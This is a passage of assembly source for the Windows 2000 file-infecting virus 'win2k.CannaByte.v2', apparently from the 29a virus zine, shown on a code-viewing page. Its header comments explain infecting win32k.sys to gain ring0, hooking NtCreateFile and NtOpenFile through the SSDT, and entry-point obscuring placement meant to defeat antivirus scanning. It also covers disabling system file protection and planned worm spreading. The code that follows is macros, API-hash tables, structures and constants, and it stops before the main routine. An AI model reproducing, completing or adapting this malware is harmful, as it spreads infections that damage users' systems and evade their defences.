📄 29a-7.006
字号:
;win2k.CannaByte.v2 coded by (Super && vallez)
;
;IMPORTANT: THIS CODE IS ONLY FOR READ AND IF YOU WANT TEST IT. IM NOT RESPONSABLE IF YOU
;USE IT FOR BAD THINGS. IN ADDITION NOW THE VIRUS WILL INFECT WIN32K.SYS AND WILL HOOK
;THE APIS BUT IT WILL INFECT ONLY ZZZ.EXE FILE SO FOR IT WORKS FULLY IT MUST BE MODIFIED.
;
;When a infected file arrives to a system it will infect the system.
;The expansion method will be to intercept NtCreateFile and NtOpenFile in SSDT,
;and infect all files that will be opened.
;For that propose,the virus will try to go ring0 and intercept there system calls.
;For going to ring0 virus will infect win32k.sys and in the next restart the virus will
;be loaded in ring0.
;Ill no explain lot of more things here coz virus is very commented so its easily
;understandable.
;version 2 improvements:
;
;Cksum of win32k.sys calculated on the fly,without using apis.
;
;RING0 EPO infection:
;
; The virus will infect in this manner: it will copy itself in reloc section,however,
; it will take RVA of relocs. Then it will add a random offset from this RVA. In addition
; reloc pointer will be erased from data directory. Avs will not able to start the
; searching from a part of PE becoz the virus could be copied to any section and any
; offset in the section. In addition the vx will infect using EPO:
; The virus will search code section where entrypoint is there. It will calculate a random
; offset from the start of the section. The offset could be between instructions..without
; pointing a valid opcode. Here the super's theory comes:
;
; Super's Theory:
;
; When u jump a random number of bytes in a buffer of code its possible u will
; jump to a zone between instruction. For example: E8 11 22 33 44 its possible
; in a random jump you will stay pointing 11 or 22 instead instruction opcode E8.
; but its possible redrive ur pointer to opcodes doing a route over the code
; getting instruction lengths and adding them to your pointer, 16 times at max.
; Then u will be in opcodes sure.
;
; The theory was full tested and it works perfectly...x86 secrets :)
;
; Well,using the theory we can redrive our pointer to a valid opcode. From that
; opcode we will search a call, E8 XX XX XX XX. We will hook that call for
; giving the control the vx.
;
; This method could be very powerfull: avs cannot search the vx at a fixed offset
; and they cannot search the call at a fixed offset. They cannot start to search
; the vx from the end of the file, becoz the virus could be far of there.
; In big hosts they will need to read lot of bytes of the host for finding the vx.
;
; We are using length disassembler engine (lde32) by Z0mbie :) We love your engine.
;
;
; Problems with EPO: we are copying the vx to a offset from relocs start. In the previous
; version the virus infected more files, it had more space for infection. Now it will
; discard more files. However infected files will be more difficult to detect.
;
;
;Other improvements we would like to add with more time:
;
; Worm support: today internet is the battlefield for vx. Well,this is my opinion:
; infector viruses are powerful, becoz they are more difficult to be detected,coverall
; if they are using methods as EPO, poli/meta-morphism, cavity...and other powerful
; techniques. However internet is succulent for viruses, and a good virus must have
; internet support. A very powerful virus would have to combine both things, a
; good infection method, difficulting detection, and a fast expansion method,using
; internet. We want to add a worm part:
; The worm part will be in ring3 sending random files from the infected machine. These
; files will be infected by the hook in the ring0 vx part.
;
; Sfc disabling: now the virus is able to disable sfc in win2k using benny and ratter
; method. It would be interesting to add new methods for disabling sfc in all systems.
; No string searching for patching better. Im sure in the next zine new methods will
; appears, more generic methods,so it would be interesting to add them.
;
; Full stealth in memory and disk: we are in ring0 hooking NtCreateFile and NtOpenFile...
; why not a full stealth in disk for win32k.sys? no time now.. :( In the same manner
; we would like to add full stealth in memory.
;
;
;THX TO:
;
;-As always Xezaw :) my dear m3nt0r ;) (THE BEST m3nt0r) I must say u thx coz that lot of
;patience that u had haven with me :) im a "ceporro" (i dont know how to say this in
;english xDD)
;-My second dear m3nt0r :) Super. How its possible u know all things i ask u? O_O xDD
;-VirusBust :) a good friend who helped me a lot of too.
;-Morphine: the most likeable girl in the undernet :D and in the world too! ;D i adore to
;speak with u :)
;Remains, ring0 machine :)
;-Pato,Nigthmare,isotope,ViR[-_-],MrHangman,Oyzzo,bi0s,... My best friends :)
;-Nmt,ur articles have helped me lot of :)
;-GriYo who always helped me too a lot of :) when i have needed.
;-Ratter&Benny: i dont know u but i must say ur articles and virus codes have helped me
;lot of very much.(When i added this line in parenthesys i already knew ratter and i must
;say thx again for ur help ;)
;-Z0mbie: ur engine is a boom!! :D
;-Well,"THX TO" part is the more difficult part to code coz always u will forget to thx
;somebody so i must say thx all people that i forget to put here :)
;-And OfCorz a infinitely BIG THX TO 'Lady Marian' :********************* U r resident
;in my memory all time :D
.586p
.model flat,stdcall
extrn ExitProcess:proc
extrn GetLastError:proc
extrn GetModuleHandleA:proc
;29a files
include mz.inc
include pe.inc
include win32api.inc
include useful.inc
;macros
;;;;;;;;;;;;;;;;;;;;;;;
callz macro dir_call
db 0E8h
dd (dir_call - $ - 4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
jmpz macro dir_call
db 0E9h
dd (dir_call - $ -4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
CalcLenString macro
local loopin
push esi
dec esi
loopin:
inc esi
cmp byte ptr[esi],0
jne loopin
mov ecx,esi
pop esi
sub ecx,esi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezApi macro BaseKernel,ApiCRC,ApiNameLen
mov eax,BaseKernel
mov edx,ApiCRC
mov ebx,ApiNameLen
callz GetApi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen
GezApi BaseNtdll,ApiCRC,ApiNameLen
mov eax,[eax + 1]
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
syscallz macro fc,paramz ;from Ratter's win2k.Joss
mov eax,fc
lea edx,[esp]
int 2eh
add esp,(paramz*4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov [esp],esp ;for storing number of writted bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov [esp],esp ;for storing number of read bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;APIS'S NAMES CRCS AND LENGHTS
LoadLibraryACRC equ 3fc1bd8dh
LLNameLen equ 12
CloseHandleCRC equ 0b09315f4h
CHNameLen equ 11
FindFirstFileACRC equ 0c9ebd5ceh
FFFNameLen equ 14
FindNextFileACRC equ 75272948h
FNFNameLen equ 13
FindCloseCRC equ 0d82bf69ah
FCNameLen equ 9
GetTickCountCRC equ 5b4219f8h
GTCNameLen equ 12
WriteMemoryProcessCRC equ 4f58972eh
WMPNameLen equ 18
ReadMemoryProcessCRC equ 0f7c7ae42h
RMPNameLen equ 17
ResumeThreadCRC equ 3872beb9h
RTNameLen equ 12
ExitProcessCRC equ 251097CCh
EPNameLen equ 11
SetFileAttributesACRC equ 156b9702h
SFANameLen equ 18
CreateFileACRC equ 553b5c78h
CFNameLen equ 11
CreateFileMappingACRC equ 0b41b926ch
CFMNameLen equ 18
MapViewOfFileCRC equ 0A89b382fh
MVFNameLen equ 13
UnmapViewOfFileCRC equ 391ab6afh
UVFNameLen equ 15
SetFileTimeCRC equ 21804a03h
SFTNameLen equ 11
GetModuleHandleACRC equ 0B1866570h
GMHNameLen equ 16
GetLastErrorCRC equ 0d2e536b7h
GLENameLen equ 12
RegisterServiceProcessCRC equ 3b5ef61fh
RSPNameLen equ 22
SetCurrentDirectoryACRC equ 69b6849fh
SCDNameLen equ 20
GetCurrentDirectoryACRC equ 0c79dc4e3h
GCDNameLen equ 20
GetWindowsDirectoryACRC equ 0fff372beh
GWDNameLen equ 20
GetModuleFileNameACRC equ 08bff7a0h
GMFNNameLen equ 18
CreateProcessACRC equ 0a851d916h
CPNameLen equ 14
Module32FirstCRC equ 38891c00h
M32FNameLen equ 13
Module32NextCRC equ 0f6911852h
M32NNameLen equ 12
CreateToolhelp32SnapShotCRC equ 0c1f3b876h
CT32SNameLen equ 24
VirtualProtectExCRC equ 5d180413h
VPNameLen equ 16
GetCurrentProcessCRC equ 0d0861aa4h
GCPNameLen equ 17
OpenProcessTokenCRC equ 0f9c60615h
OPTNameLen equ 16
LookupPrivilegeValueACRC equ 0da87bf62h
LPVNameLen equ 21
AdjustTokenPrivilegesCRC equ 0de3e5cfh
ATPNameLen equ 21
EnumProcessesCRC equ 0509a21ch
EPSNameLen equ 13
EnumProcessModulesCRC equ 0dea82ac2h
EPMNameLen equ 18
GetModuleInformationCRC equ 0f2a84636h
GMINameLen equ 20
SuspendThreadCRC equ 0bd76ac31h
STNameLen equ 13
FreeLibraryCRC equ 0da68238fh
FLNameLen equ 11
GetVersionCRC equ 4ccf1a0fh
GVNameLen equ 10
RasDialACRC equ 0b88da156h
RDNameLen equ 8
GetModuleBaseNameACRC equ 1720513eh
GMBNNameLen equ 18
OpenProcessCRC equ 0df27514bh
OPNameLen equ 11
ZwConnectPortCRC equ 0cbaec255h
ZCPNameLen equ 13
NtConnectPortCRC equ 0c88edce9h
NCPNameLen equ 13
ZwRequestPortCRC equ 0e28aebd1h
ZRPNameLen equ 13
DbgUiConnectToDbgCRC equ 09a51ac3ah
DUCTDNameLen equ 17
DbgSsInitializeCRC equ 0d198b351h
DSINameLen equ 15
DbgSsHandleKmApiMsgCRC equ 2e9c4e99h
DSHKAMNameLen equ 19
GetCurrentProcessIdCRC equ 1db413e3h
GCPINameLen equ 19
GetCurrentThreadIdCRC equ 8df87e63h
GCTINameLen equ 18
WaitForDebugEventCRC equ 96ab83a1h
WFDENameLen equ 17
ContinueDebugEventCRC equ 0d8e77e49h
CDENameLen equ 18
VirtualAllocExCRC equ 0e62e824dh
VANameLen equ 14
CreateRemoteThreadCRC equ 0ff808c10h
CRTNameLen equ 18
NtTerminateProcessCRC equ 94fcb0c0h
NTPNameLen equ 18
ExitThreadCRC equ 80af62e1h
ETNameLen equ 10
GetCurrentDirectoryWCRC equ 334971b2h
GCDWNameLen equ 20
FindFirstFileWCRC equ 3d3f609fh
FFFWNameLen equ 14
SleepCRC equ 0cef2eda8h
SNameLen equ 5
MoveFileACRC equ 0de9ff0d1h
MFNameLen equ 9
MapFileAndCheckSumACRC equ 462eeff7h
MFACSNameLen equ 19
CheckSumMappedFileCRC equ 0bbb4966eh
CSMFNameLen equ 18
CopyFileACRC equ 0199dc99h
CpFNameLen equ 9
KeServiceDescriptorTableCRC equ 32a4d557h
KSDTNameLen equ 24
NtCreateFileCRC equ 3ee6cc56h
NCFNameLen equ 12
ZwOpenFileCRC equ 0b679c176h
ZOFNameLen equ 10
ZwOpenSectionCRC equ 73bdfd70h
ZOSNameLen equ 13
ZwMapViewOfSectionCRC equ 0d287ee26h
ZMVOSNameLen equ 18
ZwCloseCRC equ 180c0d23h
ZCNameLen equ 7
ZwCreateSectionCRC equ 2c919477h
ZCSNameLen equ 15
ZwUnmapViewOfSectionCRC equ 9d35f923h
ZUVOSNameLen equ 20
NtOpenFileCRC equ 0a1b1dc21h
NOFNameLen equ 10
ZwDeleteFileCRC equ 6967772dh
ZDFNameLen equ 12
DeleteFileACRC equ 919b6bcbh
DFNameLen equ 11
ZwCreateFileCRC equ 0a81a7cd4h
ZCFNameLen equ 12
PsCreateSystemThreadCRC equ 32adfc3ah
PCSTNameLen equ 20
KeQueryTickCountCRC equ 52d6480eh
KQTCNameLen equ 16
Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string
TOKEN_PRIVILEGES struc
TP_count dd ?
TP_luid dq ?
TP_attribz dd ?
TOKEN_PRIVILEGES ends
unicode_string struc
us_Length dw ?
us_MaximumLength dw ?
us_Buffer dd ?
unicode_string ends
objects_attributes struc
oa_length dd ? ;lenght of this structure
oa_rootdir dd ?
oa_objectname dd ? ;name of the object
oa_attribz dd ? ;attributes of the object
oa_secdesc dd ?
oa_secqos dd ?
objects_attributes ends
pio_status struc
ps_ntstatus dd ?
ps_info dd ?
pio_status ends
TOKEN_ASSIGN_PRIMARY equ 00000001h
TOKEN_DUPLICATE equ 00000002h
TOKEN_IMPERSONATE equ 00000004h
TOKEN_QUERY equ 00000008h
TOKEN_QUERY_SOURCE equ 00000010h
TOKEN_ADJUST_PRIVILEGES equ 00000020h
TOKEN_ADJUST_GROUPS equ 00000040h
TOKEN_ADJUST_DEFAULT equ 00000080h
TOKEN_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED or \
TOKEN_ASSIGN_PRIMARY or \
TOKEN_DUPLICATE or \
TOKEN_IMPERSONATE or \
TOKEN_QUERY or \
TOKEN_QUERY_SOURCE or \
TOKEN_ADJUST_PRIVILEGES or \
TOKEN_ADJUST_GROUPS or \
TOKEN_ADJUST_DEFAULT
SE_PRIVILEGE_ENABLED equ 00000002h
CHECKSUM_SUCCESS equ 00000000h
CHECKSUM_OPEN_FAILURE equ 00000001h
CHECKSUM_MAP_FAILURE equ 00000002h
CHECKSUM_MAPVIEW_FAILURE equ 00000003h
CHECKSUM_UNICODE_FAILURE equ 00000004h
OBJ_CASE_INSENSITIVE equ 00000040h
FILE_DIRECTORY_FILE equ 00000001h
FILE_WRITE_THROUGH equ 00000002h
FILE_SEQUENTIAL_ONLY equ 00000004h
FILE_NO_INTERMEDIATE_BUFFERING equ 00000008h
FILE_SYNCHRONOUS_IO_ALERT equ 00000010h
FILE_SYNCHRONOUS_IO_NONALERT equ 00000020h
FILE_NON_DIRECTORY_FILE equ 00000040h
FILE_CREATE_TREE_CONNECTION equ 00000080h
FILE_COMPLETE_IF_OPLOCKED equ 00000100h
FILE_NO_EA_KNOWLEDGE equ 00000200h
FILE_OPEN_FOR_RECOVERY equ 00000400h
FILE_RANDOM_ACCESS equ 00000800h
FILE_DELETE_ON_CLOSE equ 00001000h
FILE_OPEN_BY_FILE_ID equ 00002000h
FILE_OPEN_FOR_BACKUP_INTENT equ 00004000h
FILE_NO_COMPRESSION equ 00008000h
FILE_RESERVE_OPFILTER equ 00100000h
FILE_OPEN_REPARSE_POINT equ 00200000h
FILE_OPEN_NO_RECALL equ 00400000h
FILE_OPEN_FOR_FREE_SPACE_QUERY equ 00800000h
FILE_COPY_STRUCTURED_STORAGE equ 00000041h
FILE_STRUCTURED_STORAGE equ 00000441h
FILE_VALID_OPTION_FLAGS equ 00ffffffh
FILE_VALID_PIPE_OPTION_FLAGS equ 00000032h
FILE_VALID_MAILSLOT_OPTION_FLAGS equ 00000032h
FILE_VALID_SET_FLAGS equ 00000036h
FILE_SHARE_READ equ 00000001h
FILE_SHARE_WRITE equ 00000002h
FILE_READ_DATA equ 00000001h
FILE_WRITE_DATA equ 00000002h
FILE_APPEND_DATA equ 00000004h
FILE_OPEN_IF equ 00000003h
FILE_OPEN equ 00000001h
FILE_NON_DIRECTORY_FILE equ 00000040h
STATUS_SUCCESS equ 00000000h
SEC_COMMIT equ 08000000h
SECTION_QUERY equ 00000001h
SECTION_MAP_WRITE equ 00000002h
SECTION_MAP_READ equ 00000004h
SECTION_MAP_EXECUTE equ 00000008h
SECTION_EXTEND_SIZE equ 00000010h
STANDART_RIGTHS_REQUIRED equ 000F0000h
SYNCHRONIZE equ 00100000h
THREAD_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE + 3FFh)
STARTUPINFOSIZE equ 68
PROCESSINFORMATIONSIZE equ 16
cPushfd equ 4
tamvirus = evirus - svirus
.data;
;;;;;;
az db 'KeQueryTickCount',0
azz db 'WriteProfileStringA',0
vallez db 'vallez for 29a',0
.code;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -